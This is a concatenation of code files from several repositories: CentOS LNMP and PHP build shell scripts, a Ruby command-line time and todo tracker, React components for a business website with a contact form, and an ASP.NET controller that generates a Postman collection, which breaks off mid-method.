## CentOS-6.5-x86_64-minimal初始安装后,常用工具命令安装。
## 云更新web组(liuhui05)
#############################################################
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
yum -y install wget gcc gcc-c++ lrzsz ntp unzip
#同步时间
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate us.pool.ntp.org<file_sep>/lnmp安装/php-etc/php.d/03-imagick.ini
; Loads the ImageMagick PHP extension. Dropped into php.d/ so it is
; picked up via PHP's --with-config-file-scan-dir directory.
extension=imagick.so
<file_sep>/lnmp安装/软件安装/mysql安装/mysql_client_install.sh
#!/bin/sh
# Builds a client-only MySQL (cmake -DWITHOUT_SERVER=ON) plus its build
# prerequisites, then compiles the legacy php-mysql extension against it.
# Tarballs are expected to already exist in /root/download.

# Install bison
echo "正在安装bison******************"
cd /root/download/
tar xf bison-3.0.tar.gz
cd bison-3.0
./configure
make && make install
echo "bison安装成功******************"

# Install ncurses
echo "*********************************"
echo "*********************************"
echo "正在安装ncurses******************"
echo "*********************************"
echo "*********************************"
cd /root/download/
tar xf ncurses-5.8.tar.gz
cd ncurses-5.8
./configure
make && make install
echo "ncurses安装成功******************"

# Install CMake
# BUG FIX: this progress message previously said "CMAKE安装成功"
# (install succeeded) BEFORE the build even started.
echo "正在安装CMAKE******************"
cd /root/download/
tar xf cmake-2.8.12.2.tar.gz
cd cmake-2.8.12.2
./configure
gmake && make install

# Install MySQL (client only)
echo "正在安装mysql******************"
cd /root/download/
tar xf mysql-5.6.17.tar.gz
cd mysql-5.6.17
cmake ./ -DWITHOUT_SERVER=ON -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -Wno-dev
make && make install
# BUG FIX: this message previously said "bison安装成功" although the
# step that just finished was the MySQL build.
echo "mysql安装成功******************"

# Build the php-mysql extension against the freshly installed client
echo "正在安装php-mysql扩展******************"
cd /usr/local/src/php-5.4.25/ext/mysql/
/usr/local/php-5.4.25/bin/phpize
./configure --with-php-config=/usr/local/php-5.4.25/bin/php-config --with-mysql=/usr/local/mysql
make && make install
echo "php-mysql扩展安装成功******************"
echo "请手动修改php.ini配置文件,加载mysql.so,重启php-fpm"
#!/bin/bash
##############################################
## php 5.4.25 install script, plus the SQL Server (FreeTDS/mssql)
## PHP driver build.
## cloud-update web team (liuhui05)
#############################################
# BUG FIX: the shebang was below the comment banner, so it was inert;
# it must be the first line of the file to select bash.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
mkdir -p /usr/local/php
# Install base libraries
yum -y install libxml2 libxml2-devel curl-devel libjpeg-devel libpng-devel
# Install libmcrypt (needed for --with-mcrypt)
cd /usr/local/src
wget ftp://mcrypt.hellug.gr/pub/crypto/mcrypt/attic/libmcrypt/libmcrypt-2.5.7.tar.gz
tar -zxvf libmcrypt-2.5.7.tar.gz
cd libmcrypt-2.5.7
./configure
make && make install
####################################
## Install php-5.4.25
####################################
cd /usr/local/src
wget http://cn2.php.net/distributions/php-5.4.25.tar.gz
tar zvxf php-5.4.25.tar.gz
cd php-5.4.25
./configure --prefix=/usr/local/php-5.4.25 --with-config-file-path=/usr/local/php-5.4.25/etc --with-mysql=mysqlnd --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-gd --with-iconv --with-zlib --enable-xml --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curlwrappers --enable-mbregex --enable-fpm --enable-mbstring --enable-ftp --enable-gd-native-ttf --with-openssl --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-gettext --enable-session --with-mcrypt --with-curl
make # compile
make install # install
cp /usr/local/src/php-5.4.25/php.ini-production /usr/local/php-5.4.25/etc/php.ini
cp /usr/local/php-5.4.25/etc/php-fpm.conf.default /usr/local/php-5.4.25/etc/php-fpm.conf
cp /usr/local/src/php-5.4.25/sapi/fpm/init.d.php-fpm.in /etc/init.d/php-fpm
chmod +x /etc/init.d/php-fpm # make it executable
# /etc/init.d/php-fpm still needs manual configuration
# /usr/local/php-5.4.25/etc/php-fpm.conf still needs manual configuration
# /usr/local/php-5.4.25/etc/php.ini still needs manual configuration
#chkconfig --add php-fpm
#chkconfig php-fpm on
####################################
## Install the SQL Server PHP driver (FreeTDS + ext/mssql)
####################################
cd /usr/local/src
wget ftp://ftp.freetds.org/pub/freetds/stable/freetds-stable.tgz
tar zxvf freetds-stable.tgz
# NOTE(review): assumes the stable tarball still unpacks to
# freetds-0.91 - verify the directory name after extraction.
cd freetds-0.91/
./configure --prefix=/usr/local/freetds --enable-msdblib
make && make install
touch /usr/local/freetds/include/tds.h
touch /usr/local/freetds/lib/libtds.a
# Configure /usr/local/freetds/etc/freetds.conf manually
cd /usr/local/src/php-5.4.25/ext/mssql/
/usr/local/php-5.4.25/bin/phpize
./configure --with-php-config=/usr/local/php-5.4.25/bin/php-config --with-mssql=/usr/local/freetds
make && make install
# Edit php.ini to load mssql.so
# BUG FIX: the line below was a stray, un-commented duplicate of the
# main PHP configure call; at this point the cwd is ext/mssql, so
# running it would have reconfigured the wrong tree. Kept only as a
# reference for an alternate /usr/local/php prefix:
#./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=mysqlnd --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-gd --with-iconv --with-zlib --enable-xml --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curlwrappers --enable-mbregex --enable-fpm --enable-mbstring --enable-ftp --enable-gd-native-ttf --with-openssl --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-gettext --enable-session --with-mcrypt --with-curl
php7的redis扩展安装:
creating redis.la
(cd .libs && rm -f redis.la && ln -s ../redis.la redis.la)
/bin/sh /usr/local/src/phpredis-php7/libtool --mode=install cp ./redis.la /usr/local/src/phpredis-php7/modules
cp ./.libs/redis.so /usr/local/src/phpredis-php7/modules/redis.so
cp ./.libs/redis.lai /usr/local/src/phpredis-php7/modules/redis.la
PATH="$PATH:/sbin" ldconfig -n /usr/local/src/phpredis-php7/modules
----------------------------------------------------------------------
Libraries have been installed in:
/usr/local/src/phpredis-php7/modules
If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
- add LIBDIR to the `LD_LIBRARY_PATH' environment variable
during execution
- add LIBDIR to the `LD_RUN_PATH' environment variable
during linking
- use the `-Wl,--rpath -Wl,LIBDIR' linker flag
- have your system administrator add LIBDIR to `/etc/ld.so.conf'
See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
Build complete.
Don't forget to run 'make test'.
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20151012/<file_sep>/lnmp安装/lnmp_install.sh
#!/bin/bash
# Unattended LNMP bootstrap: builds nginx-quic (against BoringSSL,
# cloudflare zlib and ngx_brotli) and PHP 7.4 from source, installs
# systemd units and starts both services.
# BUG FIX: the shebang was buried below the variable block and inert;
# it must be the first line of the file.

# Software versions
nginx_version="nginx-quic"
php_version="php-7.4.10"
# Download URLs
nginx_download_url="http://hg.nginx.org/nginx-quic/archive/tip.tar.gz"
php_download_url="https://github.com/php/php-src/archive/php-7.4.10.tar.gz"
# Install prefixes
nginx_install_path="/usr/local/nginx"
php_install_path="/usr/local/php"
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: 请用root权限运行脚本"
exit 1
fi
echo "创建相关目录"
mkdir -p $nginx_install_path
mkdir -p $php_install_path
mkdir -p /root/src
rm -rf /usr/local/nginx
rm -rf /usr/local/php
echo "安装依赖及工具"
rpm -ivh http://mirrors.wlnmp.com/centos/wlnmp-release-centos.noarch.rpm
yum -y install git wget cmake gcc gcc-c++ wntp lrzsz unzip libunwind-devel golang pcre-devel
# Sync system time
echo "同步系统时间"
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate us.pool.ntp.org
echo "创建相关用户"
groupadd www
useradd -s /sbin/nologin -g www www
echo "下载相关软件包"
cd /root/src
[ ! -f tip.tar.gz ] && wget $nginx_download_url
[ ! -f php-7.4.10.tar.gz ] && wget $php_download_url
echo "编译boringssl密码库"
export GOPROXY=https://goproxy.io
export GO111MODULE=on
[ ! -d /root/src/boringssl ] && git clone https://github.com/google/boringssl.git
cd boringssl
mkdir -p build .openssl/lib .openssl/include
ln -sf /root/src/boringssl/include/openssl /root/src/boringssl/.openssl/include/openssl
touch /root/src/boringssl/.openssl/include/openssl/ssl.h
cmake -B/root/src/boringssl/build -H/root/src/boringssl
make -C /root/src/boringssl/build
cp /root/src/boringssl/build/crypto/libcrypto.a /root/src/boringssl/build/ssl/libssl.a /root/src/boringssl/.openssl/lib
echo "下载nginx第三方库"
cd /root/src
[ ! -d /root/src/zlib-cf ] && git clone https://gitee.com/zach/zlib.git zlib-cf
cd zlib-cf
make -f Makefile.in distclean
cd /root/src
[ ! -d /root/src/ngx_brotli ] && git clone https://gitee.com/zach/ngx_brotli.git
cd ngx_brotli
git submodule update --init --recursive
cd /root/src
echo "开始安装nginx..........."
echo
# BUG FIX: /var/log/nginx was chown'ed without ever being created.
mkdir -p /var/log/nginx
chown www.www /var/log/nginx
[ ! -d /root/src/nginx-quic-* ] && tar zxvf tip.tar.gz
cd nginx-quic-*/
sed -i 's@CFLAGS="$CFLAGS -g"@#CFLAGS="$CFLAGS -g"@' auto/cc/gcc
./auto/configure --prefix=/usr/local/nginx --user=www --group=www --with-http_stub_status_module --with-http_v2_module --with-http_ssl_module --with-http_gzip_static_module --with-http_realip_module --with-http_flv_module --with-http_mp4_module --with-pcre --with-pcre-jit --with-zlib=../zlib-cf --add-module=../ngx_brotli --with-ld-opt='-ljemalloc' --with-debug --with-http_v3_module --with-cc-opt="-I../boringssl/include" --with-ld-opt="-L../boringssl/build/ssl -L../boringssl/build/crypto" --with-http_quic_module --with-stream_quic_module
make && make install
cd /root/src
mv /usr/local/nginx/conf /usr/local/nginx/conf.bak
cp -r nginx-conf /usr/local/nginx/conf
cp nginx.service /lib/systemd/system/
chmod +x /lib/systemd/system/nginx.service
systemctl enable nginx
mkdir -p /data/wwwlogs/
mkdir -p /data/wwwroot/default
mkdir -p /usr/local/nginx/conf/vhost
touch /data/wwwlogs/access_nginx.log
systemctl start nginx
echo "nginx安装完成"
echo "预备安装PHP"
# Install base libraries
# BUG FIX: this yum call and the dnf call below had no -y, which hangs
# an unattended install waiting for confirmation.
yum -y install autoconf automake bison libxml2 openssl-devel sqlite-devel libcurl-devel libpng-devel libjpeg-devel freetype-devel libicu-devel libsodium-devel argon2 libargon2-devel libxslt-devel libzip-devel
dnf -y --enablerepo=PowerTools install oniguruma-devel
yum -y install git automake gcc gcc-c++ libtool
cd /root/src
# Install re2c (lexer generator needed by the PHP build)
# BUG FIX: the guard was "[ ! -d ... ] git clone ..." without &&, so
# the test swallowed the git command and the clone never ran.
[ ! -d /root/src/re2c ] && git clone https://github.com/skvadrik/re2c.git re2c
cd re2c
mkdir -p m4
./autogen.sh && ./configure
make && make install
cd /root/src
# BUG FIX: same missing && as above - the tarball was never extracted.
[ ! -d /root/src/php-src-php-7.4.10 ] && tar zvxf php-7.4.10.tar.gz
cd php-src-php-7.4.10
./buildconf --force
./configure --prefix=/usr/local/php \
--with-config-file-path=/usr/local/php/etc \
--with-config-file-scan-dir=/usr/local/php/etc/php.d \
--with-fpm-user=www \
--with-fpm-group=www \
--enable-mbstring \
--enable-ftp \
--enable-gd \
--enable-opcache \
--enable-gd-jis-conv \
--enable-mysqlnd \
--enable-pdo \
--enable-sockets \
--enable-fpm \
--enable-xml \
--enable-soap \
--enable-pcntl \
--enable-cli \
--with-freetype \
--with-jpeg \
--with-openssl \
--with-mysqli=mysqlnd \
--with-pdo-mysql=mysqlnd \
--with-pear \
--with-zlib \
--with-iconv \
--with-curl \
--enable-bcmath \
--enable-shmop \
--enable-exif \
--enable-sysvsem \
--enable-mbregex \
--with-password-argon2 \
--with-sodium=/usr/local \
--with-mhash \
--enable-intl \
--with-xsl \
--with-gettext \
--with-zip \
--disable-debug \
PKG_CONFIG_PATH=/usr/local/lib/pkgconfig/:
make && make install
mv /usr/local/php/etc /usr/local/php/etc.bak
cp -r php-etc /usr/local/php/etc
cp php-fpm.service /lib/systemd/system/
chmod +x /lib/systemd/system/php-fpm.service
systemctl enable php-fpm.service
service php-fpm status
echo "PHP安装完成"
<file_sep>/lnmp安装/软件安装/redis安装/redis_bench.sh
#!/bin/bash
# Sweeps redis-benchmark against 192.168.1.240:6379 with increasing
# client concurrency, echoing each command line before it runs.
# Minimum (starting) number of concurrent clients
minC=5000
c=0
# NOTE(review): the bound is i<1, so only a single run at minC happens;
# raise the bound to actually sweep concurrency levels (+1000 per step).
for ((i=0;i<1;i++))
do
let "c = $minC + $i*1000"
echo
echo "redis-benchmark -h 192.168.1.240 -p 6379 -n 200000 -c $c -q"
redis-benchmark -h 192.168.1.240 -p 6379 -n 200000 -c $c -q
echo
#echo $c
done
| 4bb5a4b93ff4ccce4d797614294bdca7348ec52e | [
"Markdown",
"INI",
"Shell"
] | 9 | Shell | AntiIO/lnmp | b2fcbce72e6b74091a527bb096439d8983d8b677 | 4185614ebb06e7c2de4552a4e5c98d46636c6571 |
refs/heads/master | <file_sep>require 'fileutils'
require 'date'
require './animations'
require './tracker_functions'
# Boot sequence: ensure the working directories exist, pull the latest
# tracker data from git, show the startup banner, run the interactive
# REPL until the user types "exit", then commit and push today's files.
Tracker.new.setup
Tracker.new.startup
Animation.new.startup_animation
Tracker.new.run
Tracker.new.shutdown
Animation.new.shutdown_animation<file_sep>class Animation
# Prints the startup banner by redrawing a single terminal line: each
# frame is printed, held for 0.3s, then overwritten via a carriage
# return. The final frame is held for 1s and ended with a newline.
# Frames are listed explicitly because the last step completes the word
# "MOTHER" into "MOTHERFUCKER" rather than appending a new word, so a
# simple word-join would be wrong. (Refactored from 22 copy-pasted
# print/sleep lines.)
def startup_animation
  frames = [
    "LET'S",
    "LET'S START",
    "LET'S START TRACKING",
    "LET'S START TRACKING SOME",
    "LET'S START TRACKING SOME TIME",
    "LET'S START TRACKING SOME TIME MOTHER",
    "LET'S START TRACKING SOME TIME MOTHERFUCKER"
  ]
  frames[0..-2].each do |frame|
    print frame
    sleep 0.3
    print "\r" # back to column 0 so the next frame overwrites this one
  end
  print frames.last # final frame stays on screen
  sleep 1
  print "\n"
end
# Types out "GOODBYE." one character at a time on a single terminal
# line (print prefix, wait 0.1s, overwrite via carriage return); the
# complete word is held for 1s and ended with a newline.
# (Refactored from 24 copy-pasted print/sleep lines.)
def shutdown_animation
  word = "GOODBYE."
  (1...word.length).each do |len|
    print word[0, len]
    sleep 0.1
    print "\r"
  end
  print word
  sleep 1
  print "\n"
end
# Types out "TEST" one character at a time (0.1s per intermediate
# frame, overwriting in place), then a final newline - a quick smoke
# test for the single-line animation technique.
def test_animation
  word = "TEST"
  (1...word.length).each do |len|
    print word[0, len]
    sleep 0.1
    print "\r"
  end
  print word
  print "\n"
end
end<file_sep>require 'fileutils'
require 'tempfile'
require 'date'
require './animations'
class Tracker
# Ensures the working directories (stash/, todo/, setup/) exist under
# the current directory. Uses FileUtils.mkdir_p (fileutils is already
# required by this file) instead of shelling out to mkdir; mkdir_p is
# idempotent, so the previous Dir.exist? guards are unnecessary.
def setup
  FileUtils.mkdir_p("./stash")
  FileUtils.mkdir_p("./todo")
  FileUtils.mkdir_p("./setup")
end
# Pulls the latest tracker data from the git remote before a session
# so the local STASH/TODO files are up to date (--quiet hides output).
def startup
system("git pull --quiet")
end
# Today's date as "M-D-YY" (%-m/%-d suppress zero padding); used to
# name the per-day STASH and TODO files.
def current_date
DateTime.now.strftime("%-m-%-d-%y")
end
# Current wall-clock time as 24-hour "HH:MM" (%R); prefixes each entry
# written to the STASH file.
def current_time
DateTime.now.strftime("%R")
end
# Path of today's STASH log file - one file per calendar day, named
# after current_date.
def today_file
  format("./stash/%s.txt", current_date)
end
# Path of today's TODO file - one file per calendar day, named after
# current_date.
def todo_file
  format("./todo/%s.txt", current_date)
end
# First whitespace-separated token of the input line (the command
# word); "" when the line has no tokens.
def parse(input)
  input.split(" ").first.to_s
end
# Everything after the first token, re-joined with single spaces - the
# argument string of a command like "todo buy milk".
def parse_output(input)
  words = input.split(" ")
  words[1..-1].join(" ").to_s
end
# Interactive REPL. Commands:
#   exit          - leave the loop
#   today         - cat today's STASH log
#   todo / todos  - cat today's TODO list
#   todo <text>   - append <text> to the TODO list and renumber it
#   done <n>      - mark TODO item n as done (logged to the STASH file)
#   open today    - open today's STASH file in Sublime Text
#   anything else - log it, timestamped, to today's STASH file
def run
  prompt = "~> "
  print prompt
  while (input = gets.chomp)
    if input == "exit"
      break
    elsif input.strip == ""
      print prompt
    elsif input == "today"
      system("cat #{today_file}")
      print prompt
    elsif input == "todos" || input == "todo"
      system("cat #{todo_file}")
      print prompt
    elsif parse(input) == "todo"
      open(todo_file, "a+") do |file|
        file << parse_output(input) + "\n"
      end
      puts "Added \"#{parse_output(input)}\" to today's TODO file."
      todo_number_lines
      print prompt
    elsif parse(input) == "done"
      line_number = parse_output(input)
      # "done" must be followed by exactly one numeric argument.
      if input.split(" ").size == 2 && is_number?(line_number)
        todo_done(line_number)
      else
        puts "That's not a valid command. To mark a todo as done, just type 'done' and then the number of the todo item."
      end
      print prompt
    elsif input == "open today"
      # BUG FIX: the command was in single quotes, so #{today_file} was
      # passed to the shell literally instead of being interpolated.
      system("subl #{today_file}")
      print prompt
    else
      open(today_file, "a+") do |file|
        file << "#{current_time}" + " " + input + "\n"
      end
      puts "Logged \"#{input}\" at #{current_time} in today's STASH file, #{current_date}.txt"
      print prompt
    end
  end
end
# True when line_number (String or anything responding to to_s) is a
# whole-string integer or decimal, optionally signed. Used to validate
# "done N" arguments and to detect lines that already carry an "N:"
# prefix. Now returns a real Boolean instead of MatchData/nil (every
# call site only uses it in boolean context).
def is_number?(line_number)
  text = line_number.is_a?(String) ? line_number : line_number.to_s
  # Anchored (\A...\z) so the WHOLE string must be numeric.
  # https://medium.com/launch-school/number-validation-with-regex-ruby-393954e46797
  !(/\A[+-]?\d+(\.[\d]+)?\z/ =~ text).nil?
end
# Rewrites today's TODO file so every line carries a 1-based "N: "
# prefix. Lines that already start with a numeric "N:" token are
# stripped of the old number first, so repeated calls do not stack
# prefixes. The rewrite goes through a Tempfile that then replaces the
# original via FileUtils.mv.
def todo_number_lines
temp_file = Tempfile.new('todo_temp.txt')
File.open(todo_file, 'r') do |f|
n = 1
f.each_line{|line|
# parse(line) is the first token; stripping ":" turns "3:" into "3",
# which is_number? then recognises as an existing prefix.
if is_number?(parse(line).gsub(":",""))
line = line.split(" ")[1..-1].join(" ")
temp_file.puts line.prepend("#{n}: ")
else
temp_file.puts line.prepend("#{n}: ")
end
n += 1
}
end
temp_file.close
FileUtils.mv(temp_file.path, todo_file)
end
# Marks TODO item line_number as done: appends its text (timestamped)
# to today's STASH log, removes it from the TODO file and renumbers the
# remaining entries. Prints a confirmation, or a complaint when the
# number is beyond the end of the list.
def todo_done(line_number)
  ln = line_number.to_i
  # Line count of the todo file via `wc -l` ("<count> <path>").
  lc = `wc -l "#{todo_file}"`.strip.split(" ")[0].to_i
  lna = ln - 1                  # zero-based index of the requested line
  lnb = line_number.to_s + ":"  # "N:" token used to filter the line out
  if ln > lc
    output = "You don't have that many todo's, champ."
  else
    # BUG FIX: File.open(...).readlines leaked the file handle;
    # File.readlines reads and closes in one call.
    content = File.readlines(todo_file)[lna].split(" ")[1..-1].join(" ")
    open(today_file, "a+") do |f|
      f << "#{current_time}" + " #{content}" + "\n"
    end
    output = "logged \"#{content}\" from today's todo_file in #{current_date}.txt"
    # Copy every line except the completed one, then swap the files in.
    open(todo_file, 'r') do |f|
      open('temp_todo_file.txt', 'w') do |f2|
        f.each_line do |line|
          f2.write(line) unless parse(line) == lnb
        end
      end
    end
    FileUtils.mv('temp_todo_file.txt', todo_file)
    todo_number_lines
  end
  puts output
end
# Commits today's TODO and STASH files and pushes them to the remote.
# The TODO file is only added when it exists; the STASH file is added
# unconditionally (its exist? guard is commented out below).
def shutdown
puts "Attempting to shut down gracefully and save your work."
if File.exist?(todo_file)
system("git add #{todo_file}")
system('git commit -m "update"')
end
# if File.exist?(today_file)
system("git add #{today_file}")
system('git commit -m "update"')
# end
system("git push")
end
end | bad401fe9109f868f94206c09bf4355f2eb3e6e2 | [
"Ruby"
] | 3 | Ruby | johnsillings/pistachio | e37a9a3b64b2c83ebf96929f6079494ced26aefd | af801b596cf6bc83add948019ce00ed15b872d0f |
refs/heads/master | <file_sep>import React, { Component } from 'react';
import { Switch, Route, BrowserRouter} from 'react-router-dom';
import './App.css';
import NavBar from './components/NavBar';
import Services from './components/Services';
import Contact from './components/Contact';
import Heading from './components/Heading';
import Footer from './components/Footer';
// Root component: composes the single-page layout (nav bar, hero
// heading, services, contact form, footer) inside a BrowserRouter so
// NavBar's Link/NavLink components have routing context.
// NOTE(review): Switch and Route are imported in this file but never
// used here - confirm whether per-route rendering was intended.
class App extends Component {
render() {
return (
<BrowserRouter>
<div className="App">
{/* Decorative background shapes, positioned/styled via App.css */}
<div id="shape1" className="shape1"></div>
<div id="shape2" className="shape2"></div>
<NavBar />
<Heading />
<Services />
<Contact />
<Footer />
</div>
</BrowserRouter>
);
}
}
export default App;
<file_sep>import React, { Component } from 'react';
import { NavLink, Link } from 'react-router-dom';
import '../assets/css/Navigation.css';
import {
Collapse,
NavbarToggler,
Nav,
NavItem,
} from 'reactstrap';
import Logo from './Logo';
// Responsive top navigation bar. Uses reactstrap's Collapse/
// NavbarToggler for the mobile hamburger menu: `isOpen` in state
// drives the Collapse, and `toggle` (bound in the constructor because
// it is passed as a plain callback) flips it.
class NavBar extends Component {
constructor(props) {
super(props);
this.toggle = this.toggle.bind(this);
this.state = {
isOpen: false
};
}
// Flip the collapsed/expanded state of the mobile menu.
toggle() {
this.setState({
isOpen: !this.state.isOpen
});
}
render() {
return (
<header id="mainNav">
<nav className="navbar navbar-light navbar-expand-md navigation-clean">
<div className="container">
{/* Brand logo links back to the home route */}
<Link className="navbar-brand" to='/'><Logo /></Link>
<NavbarToggler onClick={this.toggle} />
<Collapse isOpen={this.state.isOpen} navbar>
<Nav className="nav navbar-nav ml-auto" navbar>
<NavItem>
<NavLink className="nav-link" to='/services'>Services</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/portfolio'>Portfolio</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/blog'>Blog</NavLink>
</NavItem>
<NavItem>
<NavLink className="nav-link" to='/#contact'>Contact</NavLink>
</NavItem>
</Nav>
</Collapse>
</div>
</nav>
</header>
);
}
}
export default NavBar;<file_sep>import React, { Component } from 'react';
import '../assets/css/Contact.css';
// URL-encodes a flat object into an application/x-www-form-urlencoded
// body string ("k1=v1&k2=v2"), as the Netlify-style form POST expects.
const encode = (data) =>
  Object.entries(data)
    .map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
    .join("&");
// Contact form posted Netlify-style: on submit the current state is
// urlencoded (with a "form-name" field) and POSTed to "/".
class Contact extends Component {
constructor(props) {
super(props);
this.state = { name: "", email: "", phone:"", message: "" };
}
// POST the form fields, then alert on success/failure.
// preventDefault is called right after fetch() returns its promise
// (synchronously), so the browser's native submit is still cancelled.
handleSubmit = e => {
fetch("/", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: encode({ "form-name": "contact", ...this.state })
})
.then(() => alert("Success!"))
.catch(error => alert(error));
e.preventDefault();
};
// Generic change handler: the input's name attribute selects which
// state key to update (computed property name).
handleChange = e => this.setState({ [e.target.name]: e.target.value });
render() {
// NOTE(review): these destructured values are never used below - the
// inputs are uncontrolled (no value= props); confirm that is intended.
const { name, email, phone, message } = this.state;
return (
<section id="contact" name="contact">
<div className="container">
<div className="row">
<div className="col-lg-12 text-center">
<h2 className="section-heading text-uppercase">Contact Us</h2>
<h3 className="section-subheading text-muted">Lorem ipsum dolor sit amet consectetur.</h3>
</div>
</div>
<div className="row">
<div className="col-lg-12">
<form onSubmit={this.handleSubmit} id="contactForm" name="sentMessage" noValidate>
<div className="row">
<div className="col-md-6">
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="name" type="text" name="name" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name." />
<p className="help-block text-danger"></p>
</div>
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="email" type="email" name="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address." />
<p className="help-block text-danger"></p>
</div>
<div className="form-group">
<input className="form-control" onChange={this.handleChange} id="phone" type="tel" name="phone" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number." />
<p className="help-block text-danger"></p>
</div>
</div>
<div className="col-md-6">
<div className="form-group">
<textarea onChange={this.handleChange} className="form-control" id="message" name="message" placeholder="Tell Us More About Your Project *" required="required" data-validation-required-message="Please enter a message."></textarea>
<p className="help-block text-danger"></p>
</div>
</div>
<div className="clearfix"></div>
<div className="col-lg-12 text-center">
<div id="success"></div>
<button id="sendMessageButton" className="btn btn-primary btn-xl text-uppercase mt-3" type="submit">Send Message</button>
</div>
</div>
</form>
</div>
</div>
</div>
</section>
);
}
};
export default Contact;
"JavaScript"
] | 3 | JavaScript | YannickLeRoux/AzureWebSolutions | 8affc2468ab415f887fad604535b890649e4665f | 01514e1ad5630d77a6c0a356a7f0e9c2912ec675 |
refs/heads/master | <file_sep># PostmanImport
ASP.NET WebApi Postman import format
<file_sep>using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.ApiExplorer;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
namespace PostmanImport.Controllers
{
[Route("postman")]
public class PostmanController : Controller
{
private readonly IApiDescriptionGroupCollectionProvider _apiExplorer;
private readonly IHostingEnvironment _env;
public PostmanController(IApiDescriptionGroupCollectionProvider apiExplorer, IHostingEnvironment environment)
{
_apiExplorer = apiExplorer;
_env = environment;
}
[HttpGet]
public object Postman()
{
string enviroment = _env.IsDevelopment() ? "Development" : _env.IsStaging() ? "DevelopmentStaging" : _env.IsProduction() ? "Production" : "Test";
using (StreamReader envir = new StreamReader($@"{_env.ContentRootPath}\appsettings.{_env.EnvironmentName}.json"))
{
string jsonEnviroment = envir.ReadToEnd();
var postmanEnvironment = JsonConvert.DeserializeObject<Newtonsoft.Json.Linq.JObject>(jsonEnviroment)["PostmanEnvironment"];
using (StreamReader r = new StreamReader($@"{_env.ContentRootPath}\appsettings.json"))
{
string json = r.ReadToEnd();
var postman = JsonConvert.DeserializeObject<Newtonsoft.Json.Linq.JObject>(json)["Postman"];
postman["info"] = Info(postman["info"], postmanEnvironment);
List<string> forAddEnviroment = new List<string>();
postman["item"] = Item(postman["item"], ref forAddEnviroment);
postman["auth"] = Auth(postman["auth"]);
postman["event"] = Event(postman["event"], postmanEnvironment, forAddEnviroment);
return postman;
}
}
}
JToken Info(JToken data, JToken pEnvironment)
{
data["_postman_id"] = Guid.NewGuid().ToString();
data["name"] = $"{_env.ApplicationName} {_env.EnvironmentName} {DateTime.Now.ToShortDateString()}";
data["description"] = pEnvironment["ProjectDescription"];
return data;
}
JToken Item(JToken Folders, ref List<string> forAddEnviroment)
{
var tempFolder = Folders.First.DeepClone();
Folders.First.Remove();
var Conttrolers = _apiExplorer.ApiDescriptionGroups.Items[0].Items.GroupBy(x => x.ActionDescriptor.RouteValues.LastOrDefault()).ToList();
foreach (var actions in Conttrolers)
{
var folder = tempFolder.DeepClone();
#region Folder
folder["name"] = actions.FirstOrDefault().ActionDescriptor.RouteValues.LastOrDefault().Value;
#region Folder Item
foreach (var action in actions)
{
var folderItem = tempFolder["item"].First.DeepClone();
var folderItemRequest = folderItem["request"].DeepClone();
folderItem["name"] = action.RelativePath;
#region Folder Item Request
folderItemRequest["method"] = action.HttpMethod;
folderItemRequest["header"] = new JArray();
((JValue)folderItemRequest["body"].SelectToken("mode")).Value = "raw";
((JValue)folderItemRequest["body"].SelectToken("raw")).Value = "";
((JValue)folderItemRequest["url"].SelectToken("raw")).Value = $"{{ApiPath}}/{action.RelativePath}";
((JArray)folderItemRequest["url"].SelectToken("host")).Add("{{ApiPath}}");
((JArray)folderItemRequest["url"].SelectToken("path")).Add(action.RelativePath);
foreach (var paramerter in action.ParameterDescriptions)
{
if (paramerter.Source.Id != "Body" && paramerter.Source.Id != "Path")
{
if (forAddEnviroment.FirstOrDefault(t => t.Contains(paramerter.Name)) == null)
{
forAddEnviroment.Add(paramerter.Name);
}
((JArray)folderItemRequest["url"].SelectToken("query")).Add(JToken.Parse($@"{{""key"": ""{paramerter.Name}"",""value"": ""{{{{{paramerter.Name}}}}}""}}"));
}
}
#endregion
folderItem["request"] = folderItemRequest;
folderItem["response"] = new JArray();
((JArray)folder["item"]).Add(folderItem.DeepClone());
}
#endregion
folder["description"] = $"Folder for {actions.FirstOrDefault().ActionDescriptor.DisplayName}";
#endregion
((JArray)folder["item"]).First.Remove();
((JArray)Folders).Add(folder.DeepClone());
}
return Folders;
}
JToken Auth(JToken data)
{
